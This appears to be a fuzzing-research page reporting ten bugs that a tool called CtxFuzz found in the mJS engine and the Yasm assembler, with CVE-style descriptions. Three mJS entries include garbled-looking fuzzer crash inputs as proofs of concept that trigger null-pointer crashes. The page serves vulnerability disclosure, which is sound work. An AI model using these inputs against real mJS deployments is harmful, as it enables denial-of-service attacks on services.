CtxFuzz has discovered 10 previously unknown bugs in mJS and Yasm.
We are confident that CtxFuzz is effective and viable in practice.
Description Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component.
Program Yasm
Version 9defefa
Bug Type Use After Free
Description An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_parse function in the msj.c file.
Program mJS
Version 2.20.0
Bug Type Null Pointer Dereference
Description An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component.
Program Yasm
Version 9defefa
Bug Type Null Pointer Dereference
Description An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component.
Program Yasm
Version 9defefa
Bug Type Null Pointer Dereference
Description An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component.
Program Yasm
Version 9defefa
Bug Type Null Pointer Dereference
Description An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the msj.c file.
Program mJS
Version 2.20.0
Bug Type Null Pointer Dereference
POC
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+= i;
c /= 0, c } 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.
Program mJS
Version 2.20.0
Bug Type Null Pointer Dereference
POC
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888 true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file.
Program mJS
Version 2.20.0
Bug Type Null Pointer Dereference
POC
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
Description Buffer Overflow vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component.
Program Yasm
Version 9defefa
Bug Type Buffer Overflow
Description An Out of Bounds Write in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_stringify function in the msj.c file.
Program mJS
Version 2.20.0
Bug Type Stack Overflow